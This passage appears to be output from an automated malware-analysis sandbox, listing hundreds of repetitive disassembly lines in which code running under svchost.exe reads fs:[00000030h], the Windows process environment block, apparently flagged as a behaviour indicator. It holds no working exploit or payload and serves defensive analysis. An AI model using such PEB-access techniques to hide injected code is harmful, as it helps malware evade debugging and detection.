Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]	2_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]	2_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]	2_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]	2_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]	2_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]	2_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]	2_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]	2_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]	2_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]	2_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]	2_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]	2_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]	2_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]	2_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]	2_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]	2_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]	2_2_03268620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]	2_2_0323262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]	2_2_032AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]	2_2_03272619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]	2_2_03262674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]	2_2_0324C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0326C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]	2_2_032666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]	2_2_032C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]	2_2_03264588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]	2_2_0326E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]	2_2_032325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]	2_2_032365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]	2_2_0322C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]	2_2_0326A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]	2_2_032BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]	2_2_032EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]	2_2_0322645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]	2_2_0325245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]	2_2_032364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]	2_2_032644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_032BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]	2_2_032EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]	2_2_032304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304B00 mov eax, dword ptr fs:[00000030h]	2_2_03304B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]	2_2_0322CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]	2_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]	2_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]	2_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]	2_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]	2_2_032D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228B50 mov eax, dword ptr fs:[00000030h]	2_2_03228B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]	2_2_032DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]	2_2_0325EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_032BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_032DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]	2_2_0326CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]	2_2_0325EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]	2_2_0326CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]	2_2_032BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]	2_2_032DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
